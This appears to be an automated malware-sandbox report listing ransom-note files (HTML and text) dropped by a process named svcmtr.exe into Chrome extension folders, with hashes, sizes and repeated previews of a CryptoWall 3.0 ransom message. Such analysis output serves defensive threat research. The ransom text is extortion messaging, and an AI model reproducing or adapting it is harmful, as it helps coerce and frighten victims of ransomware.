                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_locales\zu\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_metadata\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\ghbmnnjooekpmoecnnnilnnbdlolhkhi\1.62.0_0\_metadata\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ca\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\cs\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\da\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
                                                                                                                          Preview:<html> <style>a { color:green; }.tb { background:white; border-style:solid; border-width:1px; padding:3px; border-color:lime; }.ttl { font-size:13px; color:880000; }</style><body style="background:#33CCFF;"> <center><div style="text-align:left; font-family:Arial; font-size:13px; line-height:20px; margin-top:10px; width:800px; background:#F4F4F4; padding:20px; border-style:solid; border-width:5px; border-color:#BABABA;"><b><font class="ttl">What happened to your files?</b></font><br> <font style="font-size:13px;">All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0.<br> More information about the encryption RSA-2048 can be found here: <a href="http://en.wikipedia.org/wiki/RSA_(cryptosystem)" target="_blank">http://en.wikipedia.org/wiki/RSA_(cryptosystem)</a><br></font><br><b><font class="ttl">What does this mean?</b></font><br><font style="font-size:13px;">This means that the structure and data within your files have been irrevocably changed, yo

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\de\restore_files_gpmus.txt

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:ASCII text, with CRLF line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2170
                                                                                                                          Entropy (8bit):5.040700981940003
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:48:zR1I6F5dP1Utn1jgY7JZ8/TwVesH2PdOx2PfQaGaBJOBCTgi:V1I2d9UtdgY1931eoUOBmgi
                                                                                                                          MD5:F609B09B3E7414BD8E77FA8872188905
                                                                                                                          SHA1:F88A86FD047A48ECA42C344CB7AC3B55F7614370
                                                                                                                          SHA-256:DD7EE7E7B023A4A907D67C8CA77AB1E54C7E31C5F92AC20D3149A2EAB14BB178
                                                                                                                          SHA-512:C8DB2869AADD8EFC3BCF2B2DED79588AFFD0BB8A27F1AC6F79C1C7D07AD3714131E6AE9BAF268B62FE11D4C11544FEE1218ECDA46A38B326B7C31B178C5AEB81
                                                                                                                          Malicious:false
                                                                                                                          Preview:______!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!______________..What happened to your files ?..All of your files were protected by a strong encryption with RSA-2048 using CryptoWall 3.0...More information about the encryption keys using RSA-2048 can be found here: http://en.wikipedia.org/wiki/RSA_(cryptosystem)....What does this mean ?..This means that the structure and data within your files have been irrevocably changed, you will not be able to work with them, read them or see them,..it is the same thing as losing them forever, but with our help, you can restore them.....How did this happen ?..Especially for you, on our server was generated the secret key pair RSA-2048 - public and private...All your files were encrypted with the public key, which has been transferred to your computer via the Internet...Decrypting of your files is only possible with the help of the private key and decrypt program, which is on our secret server.....What do I do ?..Alas, if you do not take the necessar

                                                                                                                          C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\el\restore_files_gpmus.html

                                                                                                                          Download File
                                                                                                                          Process:C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          File Type:HTML document, ASCII text, with very long lines (3796), with no line terminators
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):3796
                                                                                                                          Entropy (8bit):5.288269814648785
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:96:71xRl1YT1I+2zud4UtVPgYYheR7J3CZ7QFFqo1pkCh37RZGUC8:7XY1I+h461BYMnCBar/r7n
                                                                                                                          MD5:BF8697C81A1E0FF452E154E7D8216EED
                                                                                                                          SHA1:6A24558BCC1EA66C61F5421D5666A9AEF7BFC5DA
                                                                                                                          SHA-256:6F50D79336AC80DEFB06EAB35A480ADB634957B75E0D979E2D198F32B8215CB3
                                                                                                                          SHA-512:EBC7B6944CF8E2D75CA2A4E1F6F423980AE90BF0BD5A204E71FB5AA7D05EA49329FDCA2786C1AC80FE63B59AAF69B5794110A0AA0D2EEC880C621029DB90F6BA
                                                                                                                          Malicious:false
